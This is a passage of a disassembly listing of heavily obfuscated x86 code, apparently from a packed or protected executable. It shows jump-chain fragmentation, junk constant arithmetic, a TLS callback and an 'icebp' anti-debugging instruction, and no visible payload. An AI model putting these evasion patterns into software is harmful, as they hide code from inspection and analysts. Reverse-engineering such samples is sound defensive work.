jmp loc_423490
; END OF FUNCTION CHUNK FOR sub_42AB3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426561
loc_42B078: ; CODE XREF: sub_426561+B�j
jmp nullsub_79
; END OF FUNCTION CHUNK FOR sub_426561
; =============== S U B R O U T I N E =======================================
sub_42B07D proc near ; DATA XREF: _0182ofla:0042746F�o
mov ds:dword_42A398, eax
call sub_428D17
mov edx, 0A2CD59D9h
call sub_42B097
mov ds:dword_42B8EC, eax
retn
sub_42B07D endp
; =============== S U B R O U T I N E =======================================
sub_42B097 proc near ; CODE XREF: _0182ofla:loc_423E32�p
; sub_42AAE0-36E5�p ...
; FUNCTION CHUNK AT 0042C964 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CAB7 SIZE 00000012 BYTES
push ebp
jmp loc_42C964
sub_42B097 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_42B09D: ; CODE XREF: sub_42380D-4A1�j
; _0182ofla:0042DD99�j
mov eax, [ebp-0Ch]
cmp eax, [ebp-14h]
jb loc_425ECF
; END OF FUNCTION CHUNK FOR sub_42380D
; START OF FUNCTION CHUNK FOR sub_42CA29
loc_42B0A9: ; CODE XREF: sub_42CA29:loc_426DF4�j
mov eax, [ebp-10h]
mov eax, [eax+64h]
add eax, [ebp-14h]
cmp eax, [ebp-0Ch]
ja loc_427A60
jmp loc_428D8D
; END OF FUNCTION CHUNK FOR sub_42CA29
; =============== S U B R O U T I N E =======================================
sub_42B0C0 proc near ; DATA XREF: sub_423FCD+867F�o
push 0FFFFFFFFh
push 0
call sub_425153
sub_42B0C0 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42D33D
loc_42B0C9: ; CODE XREF: sub_42D33D+60E�j
jmp loc_426A43
; END OF FUNCTION CHUNK FOR sub_42D33D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426DC3
loc_42B0CE: ; CODE XREF: sub_426DC3+8�j
jmp nullsub_80
; END OF FUNCTION CHUNK FOR sub_426DC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_42B0D3: ; CODE XREF: sub_429E52:loc_42546C�j
xchg esi, [edi]
jnz nullsub_81
add ebp, 5E22824Ah
jmp loc_429568
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
loc_42B0E6: ; DATA XREF: sub_4230AC+C�o
push eax
mov eax, [ebp-8]
push eax
call sub_42E218
cmp dword ptr [ebp-0Ch], 0
jz loc_42A9F2
mov eax, [ebp-0Ch]
push eax
jmp loc_42936B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423395
loc_42B103: ; CODE XREF: sub_423395+7C8D�j
add eax, 4173FACFh
add eax, ebp
push offset loc_423C70
jmp loc_42B4E9
; END OF FUNCTION CHUNK FOR sub_423395
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42B115: ; CODE XREF: sub_428D63+46EC�j
; sub_428D63:loc_42DB66�j
lea eax, [ebp-26Fh]
cmp dword ptr [eax], 4742444Fh
jz loc_42595F
jmp loc_42E189
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D52E
loc_42B12C: ; CODE XREF: sub_42D52E-7B34�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
; END OF FUNCTION CHUNK FOR sub_42D52E
; START OF FUNCTION CHUNK FOR sub_42B669
loc_42B136: ; CODE XREF: sub_42B669+2256�j
mov dword ptr [ecx], 10013h
add ecx, 18h
jmp loc_424985
; END OF FUNCTION CHUNK FOR sub_42B669
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_25. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B91
loc_42B148: ; CODE XREF: sub_428B91+10�j
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_428B91
; =============== S U B R O U T I N E =======================================
sub_42B14D proc near ; CODE XREF: sub_423057+5�p
; sub_42AAF8-65A7�p ...
; FUNCTION CHUNK AT 0042E5C9 SIZE 00000005 BYTES
push ebp
push offset loc_42A273
jmp loc_42E5C9
sub_42B14D endp
; ---------------------------------------------------------------------------
locret_42B158: ; CODE XREF: _0182ofla:loc_428515�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429242
loc_42B159: ; CODE XREF: sub_429242+5008�j
jmp loc_424239
; END OF FUNCTION CHUNK FOR sub_429242
; =============== S U B R O U T I N E =======================================
sub_42B15E proc near ; CODE XREF: sub_42798F+206B�p
; _0182ofla:0042E922�j
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00423018 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004233BF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00423533 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004237BA SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00423823 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00423D6A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00423DDD SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042405E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042437E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424837 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424C4D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00425C11 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00426E04 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00427245 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042749B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00428BDA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428FBC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004290D4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00429770 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00429F99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AEB1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B6D5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D16E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042D3A9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042D68A SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042DCD8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DEF5 SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
cmp eax, ds:dword_425790
jz loc_42A7D0
mov eax, [ebp-0Ch]
mov ds:dword_425790, eax
push 0BFB5CEC1h
jmp loc_4237BA
sub_42B15E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42B180: ; CODE XREF: _0182ofla:004297A0�j
adc ebx, eax
; =============== S U B R O U T I N E =======================================
sub_42B182 proc near ; CODE XREF: _0182ofla:004257EE�p
mov [esp+0], esi
pop esi
add ecx, 6911D4B4h
add ecx, ebp
call sub_42A2FA
sub_42B182 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_42B193: ; CODE XREF: sub_4298DD-4CA7�j
push 0D0101216h
sub edi, eax
sub ebp, 228DEF5Eh
ror edi, 0Eh
jmp loc_42676A
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
loc_42B1A8: ; DATA XREF: sub_425126+6�o
pop ebp
push edx
push 2529B16Bh
xchg ebp, [esp]
mov edx, ebp
pop ebp
jmp loc_428121
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D833
loc_42B1BA: ; CODE XREF: sub_42D833-54D9�j
cmp esi, edi
jmp loc_42D8CA
; END OF FUNCTION CHUNK FOR sub_42D833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42B1C1: ; CODE XREF: sub_42798F+2F�j
jnz loc_42C36D
jmp loc_423286
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_42B1CC: ; CODE XREF: _0182ofla:0042C18C�j
mov esi, 0D6C933C0h
jmp loc_4237E2
; ---------------------------------------------------------------------------
loc_42B1D6: ; DATA XREF: _0182ofla:loc_42A31C�o
sub edx, eax
loc_42B1D8: ; CODE XREF: _0182ofla:loc_42CD94�j
call sub_428C7D
; START OF FUNCTION CHUNK FOR sub_423861
loc_42B1DD: ; CODE XREF: sub_423861+6014�j
jmp nullsub_161
; END OF FUNCTION CHUNK FOR sub_423861
; ---------------------------------------------------------------------------
loc_42B1E2: ; CODE XREF: _0182ofla:00428DEC�j
pop edx
call sub_423077
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42B1E8: ; CODE XREF: sub_428F20:loc_42B2AF�j
ja loc_42AB86
jmp loc_42356F
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
loc_42B1F3: ; CODE XREF: _0182ofla:0042CD6D�j
js loc_423B7B
; =============== S U B R O U T I N E =======================================
sub_42B1F9 proc near ; CODE XREF: _0182ofla:loc_425D09�p
; FUNCTION CHUNK AT 00423E69 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00424048 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424152 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424528 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425440 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004270D4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428473 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004290EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A2BE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042A4E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B26F SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042E0C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E54F SIZE 00000008 BYTES
mov [esp+0], ecx
loc_42B1FC: ; CODE XREF: _0182ofla:loc_429057�j
pop ecx
call sub_423FCD
jmp loc_428473
sub_42B1F9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pushf
jmp sub_427E81
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_21. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42B20E: ; CODE XREF: _0182ofla:00426514�j
jmp loc_426E5D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C415
loc_42B213: ; CODE XREF: sub_42C415-6EBE�j
jmp loc_4260BD
; END OF FUNCTION CHUNK FOR sub_42C415
; ---------------------------------------------------------------------------
loc_42B218: ; CODE XREF: _0182ofla:00428594�j
xor eax, 0FC4F34D2h
call sub_429AC6
; START OF FUNCTION CHUNK FOR sub_4265C0
loc_42B223: ; CODE XREF: sub_4265C0+5E7D�j
jmp loc_423786
; END OF FUNCTION CHUNK FOR sub_4265C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B43
loc_42B228: ; CODE XREF: sub_423B43+6287�j
jmp loc_42CFF1
; END OF FUNCTION CHUNK FOR sub_423B43
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4233EC
loc_42B22D: ; CODE XREF: sub_4233EC+7�j
pushf
push offset loc_42C155
jmp nullsub_82
; END OF FUNCTION CHUNK FOR sub_4233EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D5EF
loc_42B238: ; CODE XREF: sub_42D5EF+13�j
pop esi
add esi, 0D7D6961Dh
sub esi, 0C49C0FE6h
add esi, 3BDAAA8Fh
xchg esi, [esp+0]
jmp loc_428799
; END OF FUNCTION CHUNK FOR sub_42D5EF
; ---------------------------------------------------------------------------
push offset loc_424FE6
jmp loc_4246B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_42B25D: ; CODE XREF: sub_425DA5+372B�j
add esi, ecx
jmp loc_42B56F
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42B264: ; CODE XREF: sub_42798F:loc_42EC62�j
jz loc_423322
jmp loc_427A97
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_42B26F: ; CODE XREF: sub_42B1F9:loc_424152�j
; _0182ofla:0042C3B0�j
jnb loc_423E69
push eax
push 58AF6BE1h
pop eax
or eax, 58F3EFD3h
add eax, 0A74263F4h
jmp loc_42E54F
; END OF FUNCTION CHUNK FOR sub_42B1F9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_177. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E668
loc_42B28E: ; CODE XREF: sub_42E668+9�j
jmp loc_42333E
; END OF FUNCTION CHUNK FOR sub_42E668
; ---------------------------------------------------------------------------
loc_42B293: ; CODE XREF: _0182ofla:0042AC9E�j
jmp loc_42A840
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272F4
loc_42B298: ; CODE XREF: sub_4272F4+9�j
jmp loc_42CE0F
; END OF FUNCTION CHUNK FOR sub_4272F4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_226. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jno loc_425980
jmp sub_4232CD
; ---------------------------------------------------------------------------
locret_42B2A9: ; CODE XREF: _0182ofla:00428006�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E32
loc_42B2AA: ; CODE XREF: sub_427E32+B�j
jmp nullsub_83
; END OF FUNCTION CHUNK FOR sub_427E32
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42B2AF: ; CODE XREF: sub_428F20-5B90�j
jmp loc_42B1E8
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4243D3
loc_42B2B4: ; CODE XREF: sub_4243D3+9ECC�j
mov [ecx], ebp
; END OF FUNCTION CHUNK FOR sub_4243D3
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42B2B6: ; CODE XREF: sub_4253F4+4645�j
mov esi, ecx
jmp loc_426C26
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_42B2BD: ; CODE XREF: sub_4298DD+301C�j
add eax, 0B11CC89Ch
test eax, 10h
jmp loc_423167
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7FE
loc_42B2CE: ; CODE XREF: sub_42C7FE:loc_428F09�j
push eax
push offset sub_4231D5
jmp nullsub_101
; END OF FUNCTION CHUNK FOR sub_42C7FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42B2D9: ; CODE XREF: sub_4253F4:loc_42E075�j
xor esi, 5CF68FF1h
add esi, ebp
add esi, 77769FBBh
mov [esi], eax
jmp loc_42838F
; END OF FUNCTION CHUNK FOR sub_4253F4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_46. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D430
loc_42B2EF: ; CODE XREF: sub_42D430+7�j
jmp loc_426985
; END OF FUNCTION CHUNK FOR sub_42D430
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_65. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1DA
loc_42B2F5: ; CODE XREF: sub_42E1DA-5F9A�j
jmp loc_42DF17
; END OF FUNCTION CHUNK FOR sub_42E1DA
; ---------------------------------------------------------------------------
loc_42B2FA: ; CODE XREF: _0182ofla:00424EAD�j
jmp locret_42986F
; ---------------------------------------------------------------------------
loc_42B2FF: ; CODE XREF: _0182ofla:00425CF4�j
adc ecx, 0D13F0E41h
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_42B305: ; CODE XREF: sub_42D9A4:loc_425CDC�j
xor eax, 0DA7377F4h
add eax, 0D3BBA925h
mov eax, [eax]
or eax, eax
jmp loc_429798
; END OF FUNCTION CHUNK FOR sub_42D9A4
; ---------------------------------------------------------------------------
test ecx, eax
jmp loc_42A758
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C379
loc_42B321: ; CODE XREF: sub_42C379:loc_42B739�j
mov esp, ebp
pop ebp
mov eax, ds:dword_4231B0
or eax, eax
jmp loc_42AC7A
; END OF FUNCTION CHUNK FOR sub_42C379
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426E6A
loc_42B331: ; CODE XREF: sub_426E6A+5�j
push 57352E00h
pop edi
add edi, 9B42E737h
rol edi, 13h
loc_42B340: ; CODE XREF: _0182ofla:00425321�j
add edi, 5682EB50h
jmp loc_42E4FB
; END OF FUNCTION CHUNK FOR sub_426E6A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42B34B: ; CODE XREF: sub_428D63+CE9�j
jno loc_429B1E
shl eax, 14h
jmp loc_42A0CF
; ---------------------------------------------------------------------------
loc_42B359: ; CODE XREF: sub_428D63:loc_428B5E�j
cmp dword ptr [ebp-4], 1
jnz loc_42A0CF
jmp loc_42D108
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42B368: ; CODE XREF: sub_42798F+2E19�j
push 37C7552Bh
pop ebp
sub ebp, 7E5D5DA8h
xor ebp, 30720C8Dh
add ebp, 7726B880h
xchg ebp, [esp+0]
locret_42B383: ; CODE XREF: _0182ofla:00428D55�j
retn
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E395
loc_42B384: ; CODE XREF: sub_42E395+1C�j
jmp loc_429B47
; END OF FUNCTION CHUNK FOR sub_42E395
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42B389: ; CODE XREF: sub_423FCD+857B�j
jmp loc_42C763
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
retn 0Ch
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4235C7
loc_42B391: ; CODE XREF: sub_4235C7+B4E1�j
add eax, 0AC435D7Dh
mov eax, [eax]
call sub_42D978
loc_42B39E: ; CODE XREF: sub_42ABB7+3F67�j
jmp loc_428B83
; END OF FUNCTION CHUNK FOR sub_4235C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C906
loc_42B3A3: ; CODE XREF: sub_42C906-8B3A�j
jmp loc_42ED04
; END OF FUNCTION CHUNK FOR sub_42C906
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42B3A8: ; CODE XREF: sub_42D056-36A5�j
add ecx, 4
mov dword ptr [ecx], offset loc_42ADD2
xor eax, eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A438
loc_42B3B8: ; CODE XREF: sub_42A438+B�j
jmp loc_42C6F7
; END OF FUNCTION CHUNK FOR sub_42A438
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A64
loc_42B3BD: ; CODE XREF: sub_429A64-1C39�j
jmp sub_42E102
; END OF FUNCTION CHUNK FOR sub_429A64
; =============== S U B R O U T I N E =======================================
sub_42B3C2 proc near ; CODE XREF: sub_42D056-2771�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004233B0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00426940 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00426AEA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429E8F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042ADD2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042DF3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E533 SIZE 0000000A BYTES
push dword ptr fs:0
jmp loc_426AEA
sub_42B3C2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
public TlsCallback_0
TlsCallback_0 proc near ; DATA XREF: _0182ofla:TlsCallbacks�o
; FUNCTION CHUNK AT 00424AF8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042ECE9 SIZE 00000007 BYTES
call sub_42DFBB
loc_42B3D2: ; CODE XREF: sub_42B1F9+2ED2�j
jmp loc_42ECE9
TlsCallback_0 endp
; ---------------------------------------------------------------------------
locret_42B3D7: ; CODE XREF: _0182ofla:00425039�j
retn
; ---------------------------------------------------------------------------
loc_42B3D8: ; CODE XREF: _0182ofla:loc_42806A�j
jnz loc_4234FC
jmp loc_42E92D
; ---------------------------------------------------------------------------
loc_42B3E3: ; CODE XREF: _0182ofla:loc_426673�j
mov eax, [ebp+8]
test byte ptr [eax-8], 8
setnz al
call sub_42ECAD
pop ecx
jmp loc_4272AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D02D
loc_42B3F8: ; CODE XREF: sub_42D02D+C�j
repne icebp
jmp loc_426F22
; END OF FUNCTION CHUNK FOR sub_42D02D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C379
loc_42B3FF: ; CODE XREF: sub_42C379-46D1�j
mov ebx, edx
xchg ebx, [esp+8+var_8]
loc_42B404: ; CODE XREF: sub_42B3C2-4A77�j
push 0BD067EB4h
pop edx
rol edx, 15h
add edx, 29AAD872h
jmp loc_4290A6
; END OF FUNCTION CHUNK FOR sub_42C379
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42B418: ; CODE XREF: sub_423A2A+AB33�j
jno loc_424454
loc_42B41E: ; CODE XREF: sub_423A2A:loc_42574D�j
call sub_42AB27
retn
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
loc_42B424: ; CODE XREF: _0182ofla:0042A6B2�j
jmp loc_424109
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42B429: ; CODE XREF: sub_423A2A+2D35�j
call sub_423FCD
test al, al
jz loc_42C1BE
call nullsub_7
jmp nullsub_112
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
loc_42B440: ; CODE XREF: _0182ofla:loc_42AC7F�j
call sub_42D71D
push eax
ror eax, 0Bh
mov dword ptr ds:loc_426FAC, eax
retn
; ---------------------------------------------------------------------------
loc_42B450: ; CODE XREF: _0182ofla:0042764E�j
rol eax, 0Bh
push eax
jmp loc_42597B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_86. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42B45A: ; CODE XREF: sub_42798F-971�j
popf
add edi, 358B4EFh
loc_42B461: ; CODE XREF: sub_42798F:loc_427309�j
mov eax, 60h
call sub_4265C0
jmp loc_42D5A9
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_42B470: ; CODE XREF: sub_427445+631D�j
jo loc_427FBE
call nullsub_1
call sub_42C906
loc_42B480: ; CODE XREF: sub_42E320+6�j
jmp loc_42D137
; END OF FUNCTION CHUNK FOR sub_427445
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42B485: ; CODE XREF: sub_423FCD+60E0�j
jmp loc_42CFDA
; END OF FUNCTION CHUNK FOR sub_423FCD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_79. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E81
loc_42B48B: ; CODE XREF: sub_427E81+A�j
jmp nullsub_214
; END OF FUNCTION CHUNK FOR sub_427E81
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_42B490: ; CODE XREF: sub_42660C-52C�j
jmp loc_426EDA
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42B495: ; CODE XREF: sub_423A2A+45EE�j
jnz loc_424FA8
jmp loc_42A39C
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
mov ds:dword_42578C, eax
; START OF FUNCTION CHUNK FOR sub_428336
loc_42B4A5: ; CODE XREF: sub_428336+5�j
xor eax, eax
push edi
push 462800BAh
pop edi
and edi, 423ED095h
sub edi, ds:4000FAh
jmp loc_42488D
; END OF FUNCTION CHUNK FOR sub_428336
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42B4BF: ; CODE XREF: sub_42798F:loc_427A18�j
push offset sub_42CB00
jmp loc_4274E3
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4255E9
loc_42B4C9: ; CODE XREF: sub_4255E9+B�j
pop ebp
mov eax, ds:dword_427A54
or eax, eax
jnz loc_42869B
jmp loc_424C75
; END OF FUNCTION CHUNK FOR sub_4255E9
; ---------------------------------------------------------------------------
xor ebp, 985182D2h
jmp sub_427D2B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_67. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423395
loc_42B4E9: ; CODE XREF: sub_423395+7D7B�j
jmp nullsub_87
; END OF FUNCTION CHUNK FOR sub_423395
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426BDA
loc_42B4EE: ; CODE XREF: sub_426BDA+382A�j
jmp nullsub_88
; END OF FUNCTION CHUNK FOR sub_426BDA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_32. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42461C
loc_42B4F4: ; CODE XREF: sub_42461C+A70D�j
jmp loc_427D05
; END OF FUNCTION CHUNK FOR sub_42461C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_42B4F9: ; CODE XREF: sub_42D9A4-65FC�j
jmp loc_42D328
; END OF FUNCTION CHUNK FOR sub_42D9A4
; ---------------------------------------------------------------------------
loc_42B4FE: ; CODE XREF: _0182ofla:loc_427961�j
; _0182ofla:0042E31A�j
sub ecx, ebx
; =============== S U B R O U T I N E =======================================
sub_42B500 proc near ; CODE XREF: sub_42966F:loc_42E414�p
; FUNCTION CHUNK AT 0042A237 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042AE50 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push 0
call sub_425305
pop eax
jmp loc_42AE50
sub_42B500 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub ebx, eax
jmp loc_427E30
; ---------------------------------------------------------------------------
loc_42B518: ; DATA XREF: sub_42AB3E:loc_426504�o
xor edi, 80006B44h
popf
xchg edi, [esp]
mov eax, [ebp-4]
call sub_423A61
loc_42B52A: ; CODE XREF: _0182ofla:0042D85F�j
add eax, [esp]
adc edx, [esp+4]
add esp, 8
push offset loc_428848
jmp locret_424D8F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_42B53E: ; CODE XREF: sub_42D9A4-1332�j
; sub_42D9A4:loc_42D328�j
call sub_42CE73
; END OF FUNCTION CHUNK FOR sub_42D9A4
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42B543: ; CODE XREF: sub_42798F+125�j
jmp loc_4244E9
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_42B548: ; CODE XREF: sub_424707+12�j
jmp loc_42CB3C
; END OF FUNCTION CHUNK FOR sub_424707
; ---------------------------------------------------------------------------
loc_42B54D: ; CODE XREF: _0182ofla:00429CAA�j
ja loc_42E30E
; =============== S U B R O U T I N E =======================================
sub_42B553 proc near ; CODE XREF: sub_428041-3382�p
mov [esp+0], eax
pop eax
sbb edx, 0B9FA36D8h
cmp ecx, edx
jmp loc_425458
sub_42B553 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_141. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425629
loc_42B565: ; CODE XREF: sub_42380D+261B�j
; sub_425629:loc_425EF6�j
jmp loc_427C71
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4271D2
loc_42B56A: ; CODE XREF: sub_4271D2-193B�j
jmp locret_42C6D5
; END OF FUNCTION CHUNK FOR sub_4271D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_42B56F: ; CODE XREF: sub_425DA5+54BA�j
jo loc_42DB32
adc edx, 36CECA1Bh
jbe loc_4239FE
loc_42B581: ; CODE XREF: sub_425DA5:loc_4294CA�j
call nullsub_7
retn
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4284E7
